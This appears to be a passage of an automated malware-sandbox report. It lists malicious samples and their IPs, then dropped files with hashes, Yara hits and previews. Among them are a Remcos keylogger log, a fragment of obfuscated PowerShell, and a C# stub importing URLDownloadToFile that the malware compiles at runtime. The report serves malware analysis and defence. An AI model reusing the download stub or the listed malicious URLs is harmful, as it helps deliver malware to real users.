                                                                                        Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                        • 172.245.123.12
                                                                                        Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 192.3.179.166
                                                                                        Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                                                                        • 192.3.179.166
                                                                                        FASTLYUShttps://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 151.101.130.137
                                                                                        DHL.exeGet hashmaliciousFormBookBrowse
                                                                                        • 185.199.110.153
                                                                                        https://essind.freshdesk.com/en/support/solutions/articles/157000010576-pedido-553268637Get hashmaliciousUnknownBrowse
                                                                                        • 151.101.194.137
                                                                                        seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 151.101.1.137
                                                                                        sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        • 151.101.193.137
                                                                                        createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                        • 151.101.1.137
                                                                                        ORDER-24171200967.XLS..jsGet hashmaliciousWSHRat, Caesium Obfuscator, STRRATBrowse
                                                                                        • 199.232.196.209
                                                                                        https://ivsmn.kidsavancados.com/Get hashmaliciousUnknownBrowse
                                                                                        • 151.101.131.6
                                                                                        https://uvcr.ovactanag.ru/jQXv/Get hashmaliciousUnknownBrowse
                                                                                        • 151.101.130.137
                                                                                        https://dot.itsecuritymessages.com/45sf4657dvz4hn/afc6c7/00179cbf-581d-4c00-98d3-bf1104b204adGet hashmaliciousUnknownBrowse
                                                                                        • 151.101.2.109
                                                                                        CLOUDFLARENETUShpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.56.70
                                                                                        Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                        • 104.26.0.100
                                                                                        X2hna87N3Y.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.50.161
                                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 104.21.67.152
                                                                                        https://forms.gle/WXkgv9t1iFkxFXZb7Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.25.14
                                                                                        RkB7FehGh6.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.2.110
                                                                                        MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 172.67.177.134
                                                                                        https://onedefender.xyz/w/a/s/?lp_key=17343c9645d1ac0fef5c105d161ba25127ffc78983&clickid=ctg89et00fes73cmfgu0&trk=fireclk.xyz&language=de&feed=7539&zone=3dcf5f1b&dm=1Get hashmaliciousUnknownBrowse
                                                                                        • 172.67.181.93
                                                                                        c5bnEkMx.ps1Get hashmaliciousLummaCBrowse
                                                                                        • 104.21.64.1
                                                                                        Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.83.229
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0eLs4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                        • 172.67.187.200
                                                                                        • 151.101.193.137
                                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 172.67.187.200
                                                                                        • 151.101.193.137
                                                                                        V7giEUv6Ee.batGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.187.200
                                                                                        • 151.101.193.137
                                                                                        BwQ1ZjHbt3.batGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.187.200
                                                                                        • 151.101.193.137
                                                                                        https://onedefender.xyz/w/a/s/?lp_key=17343c9645d1ac0fef5c105d161ba25127ffc78983&clickid=ctg89et00fes73cmfgu0&trk=fireclk.xyz&language=de&feed=7539&zone=3dcf5f1b&dm=1Get hashmaliciousUnknownBrowse
                                                                                        • 172.67.187.200
                                                                                        • 151.101.193.137
                                                                                        Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.187.200
                                                                                        • 151.101.193.137
                                                                                        sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                                                                        • 172.67.187.200
                                                                                        • 151.101.193.137
                                                                                        ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                        • 172.67.187.200
                                                                                        • 151.101.193.137
                                                                                        payload_1.htaGet hashmaliciousRedLineBrowse
                                                                                        • 172.67.187.200
                                                                                        • 151.101.193.137
                                                                                        PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 172.67.187.200
                                                                                        • 151.101.193.137
                                                                                        No context
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):144
                                                                                        Entropy (8bit):3.402054886640339
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:rhlKlyKJl/Rdfwb5JWRal2Jl+7R0DAlBG45klovDl6v:6lZJlZCb5YcIeeDAlOWAv
                                                                                        MD5:6E1D56237F1297E6DDEFF309CF5D85A8
                                                                                        SHA1:613E9F4648AF40C3AF440EA7237B557FF239F872
                                                                                        SHA-256:8383D4CD531C9F70BBEBF838503AAD3C0ED3B8E7C80CAC68B3BB04D83ED01033
                                                                                        SHA-512:AEB825380455683157571C3F356E50FE626926AD7146E7109F8991EC58967A41EB12415D9B3D896786D3C6F3930E4607C5D28E6AB0E5DD56F99F5C8AB3617CA6
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                        Preview:....[.2.0.2.4./.1.2./.1.7. .0.3.:.4.5.:.4.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (3267), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):154006
                                                                                        Entropy (8bit):3.8112193041441667
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:3jl+x01Ehsnlxjjl+x01Ehsnl9jl+x01Ehsnle:3jlE0osnlxjjlE0osnl9jlE0osnle
                                                                                        MD5:F4FA61BB6C9F9721DED8D91D28EA7815
                                                                                        SHA1:10796E5D198B6007586D28F6EAF2E847F89EA51E
                                                                                        SHA-256:CBF1E928A1D028328AFCE5A494996571A51203D9C7E06EE78CD8AE1907F81F53
                                                                                        SHA-512:03CF806A49AC6FB1D739E986E81559241D2387AF2BB93DD443DEE04F8F7278D1CAD45116C46951D1888FD43922D232E6A9F1B49139C61E961EFEA0D2DE0B7013
                                                                                        Malicious:false
                                                                                        Preview:...... . . . .....B.Z.i.W.K.e.l.L.q.L.b.L.q.a.P. .=. .".A.P.N.C.B.k.x.G.W.a.c.h.W.n.L.".....t.b.i.b.m.a.j.q.i.C.c.f.P.W.W. .=. .".H.h.d.W.c.C.W.v.W.m.L.N.r.c.W.".....f.l.B.L.W.p.K.o.H.c.U.i.L.L.C. .=. .".L.W.r.z.Z.A.z.i.W.W.R.L.R.l.L.".........f.f.c.e.L.Q.Z.z.m.W.f.q.P.L.i. .=. .".k.N.Z.H.Z.t.W.c.G.p.Z.H.T.x.J.".....c.f.G.K.h.Z.C.e.L.h.m.Z.o.K.u. .=. .".W.Q.u.Q.v.L.L.Q.l.W.p.c.d.P.B.".....O.W.a.e.H.N.J.c.z.v.K.a.L.O.K. .=. .".p.l.n.h.I.P.R.j.O.a.H.n.f.b.o.".....e.A.t.H.K.n.A.K.U.S.O.W.P.i.W. .=. .".i.u.G.P.B.n.q.c.G.l.W.c.B.L.p.".....v.c.B.N.Z.d.n.L.A.p.i.c.k.j.U. .=. .".K.U.h.L.K.c.K.j.K.u.i.l.q.r.L.".....P.O.z.U.z.o.G.I.K.L.i.G.l.n.c. .=. .".e.z.p.a.o.f.h.l.K.L.c.Z.P.W.W.".....I.L.U.l.b.z.W.Z.c.K.W.m.k.e.b. .=. .".W.A.k.a.L.c.W.H.z.U.p.b.i.u.v.".....A.c.i.p.Z.l.L.i.g.e.K.c.e.U.n. .=. .".R.G.R.T.o.o.u.U.i.t.R.Z.p.l.U.".....W.z.W.N.k.T.L.o.Z.p.m.r.W.o.W. .=. .".o.f.K.c.x.q.C.l.i.S.j.e.N.A.L.".....G.l.z.Z.u.l.L.T.k.i.t.i.G.A.Q. .=. .".W.p.U.U.f.i.c.d.f.l.k.W.W.z.i.".....K.n.K.p.T.L.f.Z.
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):5829
                                                                                        Entropy (8bit):4.901113710259376
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                        MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                        SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                        SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                        SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                        Malicious:false
                                                                                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1172
                                                                                        Entropy (8bit):5.306771508165326
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:3a3gSKco4KmZjKbm51s4RPT6moUebIKo+mZ9t7J0gt/NKEr8HiD:q3gSU4xymI4RfoUeW+mZ9tK8Nz7D
                                                                                        MD5:096918C7E0454E293ADD5537793EB084
                                                                                        SHA1:647E49F0EF8BA56C9163B51346FCB10FB629B438
                                                                                        SHA-256:C4C700A80092FDC32D49D10409A6D714F17309D4D02C05EF5D3D3501FF4262C7
                                                                                        SHA-512:5F1B792834580834488BC081F9030E51C57FB4922656171CC3BC51B057C0997E7CDDF0407ED61ADE786D7D1915038C340BA2C45532492104587CA25E61A03D36
                                                                                        Malicious:false
                                                                                        Preview:@...e...........................................................@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Dec 17 10:18:37 2024, 1st section name ".debug$S"
                                                                                        Category:dropped
                                                                                        Size (bytes):1332
                                                                                        Entropy (8bit):3.9871225454787904
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:HknFzW9nqFKdHqwKTF9mfwI+ycuZhNnYakSkNPNnqS2d:JqYhKTfmo1ulnYa3kXqSG
                                                                                        MD5:2EB00FA100EAAE08199D5CBD71751F1A
                                                                                        SHA1:C448DA29181758FC1C4385F4440195AD16C2BB8C
                                                                                        SHA-256:EDAA73B51B44D82739164C77579AD2472BB4464C0BC8D0688EE5B58078F94E24
                                                                                        SHA-512:F8BE4EF53B37E77759B9CD983255BF21E98ACD89C9080640D79792C5CD22BE8428C1F049DBCC4B3354B633B88CD8CDFFFB83DB76C0B5336E71B3DF7BB0FF5F7D
                                                                                        Malicious:false
                                                                                        Preview:L....Oag.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........S....c:\Users\user\AppData\Local\Temp\eykjjr5p\CSC29E03D134814371801318532EC93FB.TMP..................uW..I?i-....K...........5.......C:\Users\user\AppData\Local\Temp\RESB0F9.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.y.k.j.j.r.5.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                        File Type:MSVC .res
                                                                                        Category:dropped
                                                                                        Size (bytes):652
                                                                                        Entropy (8bit):3.107244886938894
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryNPYak7YnqqUPNPN5Dlq5J:+RI+ycuZhNnYakSkNPNnqX
                                                                                        MD5:F3EF7557F3C0493F692D0CB4BAF54BAA
                                                                                        SHA1:6D063A212993E2C89ACFFC3A5D07D058282B232A
                                                                                        SHA-256:E4368AD00BA6CB1EB6B9E3752A4738AF21B56AEF2CBD72D5AE3A96355337927B
                                                                                        SHA-512:155051E007002A05C39267DE0FB9848FD651AC7711EE7C152B20E067D3B4A61BE7A2C064CC290CF6AE734945364B998A3122B86F667D1053F6F70AEA210BC8D1
                                                                                        Malicious:false
                                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.y.k.j.j.r.5.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.y.k.j.j.r.5.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (358)
                                                                                        Category:dropped
                                                                                        Size (bytes):467
                                                                                        Entropy (8bit):3.6338036010459898
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:V/DsYLDS81zu5vFF0svOmMmQXReKJ8SRHy4H4SlPmHigOwnQy:V/DTLDfuDz2dXfHAQy
                                                                                        MD5:773DC6CCE0B58D96F866A82999AEB27A
                                                                                        SHA1:EB94F2107C3413B9D3B836A4A8F7FE1B5385E53C
                                                                                        SHA-256:03732294582D4D93597043D70029F05476E498D1FFA698D1C51D4C377D3D8311
                                                                                        SHA-512:1194741AF23CDBE54B379F5555FA7E74F0F0287B357497CF76B63895803EF941454E4CE1C42A8D232C94262580CB62AC0F851FF5A1D9FDC52D9ED4A0AC68CE24
                                                                                        Malicious:false
                                                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace cP.{. public class uUS. {. [DllImport("URlmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr ZbPgFt,string jX,string lWuXyEHU,uint Abt,IntPtr pTBw);.. }..}.
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):371
                                                                                        Entropy (8bit):5.264048341889444
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CHhJ23fdK13hzxs7+AEszICHhJ23fdK13q9n:p37Lvkmb6KiFK13hWZEvFK13s
                                                                                        MD5:2D6845523372B984F07634A9B08A7084
                                                                                        SHA1:445B4FD4C4BF1A992B28E325E0DEA568771CEF43
                                                                                        SHA-256:B2817FAE43E204344E0718242D10EB11607592BFE36045907D314ACB3A794EB6
                                                                                        SHA-512:A28E7B489237BF51B97E569DA1D0AB29CDBF45F0BF50BBA4C140045A8BFBAE10BAD11FADEECADC11F036D6A6592DA18AE237FE274D4A8E98ACD9D105F128B31F
                                                                                        Malicious:true
                                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.0.cs"
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):3072
                                                                                        Entropy (8bit):2.787327013072933
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:etGSy9JOJK3lz8s2gkxrZMtJ1PtkZf1mmg73ryWWI+ycuZhNnYakSkNPNnqI:6BY3uRrZWJ1uJ1mv3ryd1ulnYa3kXqI
                                                                                        MD5:00764C9A8425D0F1D418DF797D648057
                                                                                        SHA1:744E7DAB3802246A8F1C958B375281B98895A949
                                                                                        SHA-256:8529678F491C41BE5FD46BF659FF981290B942D8568EF7FE852EF546FA008673
                                                                                        SHA-512:AC8C4855A7AC6EDD8CAADB934EA3E12BE4AE40A568E4A088E36C6B57D44F515C9340C81ECB0F99EF8B3A6BC9942F71D92F44316F7F930017A96D13F35EE2E2D9
                                                                                        Malicious:false
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Oag...........!.................#... ...@....... ....................................@.................................L#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3..............................................................'.....i.....i.......................................... 5.....P ......G.........M.....T.....W.....`.....d...G.....G...!.G.....G.......!.....*.......5..................................................<Module>.ey
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
                                                                                        Category:modified
                                                                                        Size (bytes):870
                                                                                        Entropy (8bit):5.322639250501619
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:KOqd3ka6KiFK132EvFK13ZKax5DqBVKVrdFAMBJTH:xika6LIGEvIpK2DcVKdBJj
                                                                                        MD5:49B62F4ED5D810B3E15612077CB4BBDE
                                                                                        SHA1:5AB16E338DB21086AEDF2DB0E1155A626FF2ECC0
                                                                                        SHA-256:0FEE17917DC4BF8C7644791095F0351FA436F590F0B34CA5EE56154D6FC82E39
                                                                                        SHA-512:7951186677544FF32C8AAA719DE3CBAC9AF126D50528E17B6410DA771D07BD3BB8E54AD58CEA0DA53C07148454B9E9983C593D7578E39F6CC10DF5E42AC448D7
                                                                                        Malicious:false
                                                                                        Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (3267), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):154006
                                                                                        Entropy (8bit):3.8112193041441667
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:3jl+x01Ehsnlxjjl+x01Ehsnl9jl+x01Ehsnle:3jlE0osnlxjjlE0osnl9jlE0osnle
                                                                                        MD5:F4FA61BB6C9F9721DED8D91D28EA7815
                                                                                        SHA1:10796E5D198B6007586D28F6EAF2E847F89EA51E
                                                                                        SHA-256:CBF1E928A1D028328AFCE5A494996571A51203D9C7E06EE78CD8AE1907F81F53
                                                                                        SHA-512:03CF806A49AC6FB1D739E986E81559241D2387AF2BB93DD443DEE04F8F7278D1CAD45116C46951D1888FD43922D232E6A9F1B49139C61E961EFEA0D2DE0B7013
                                                                                        Malicious:true
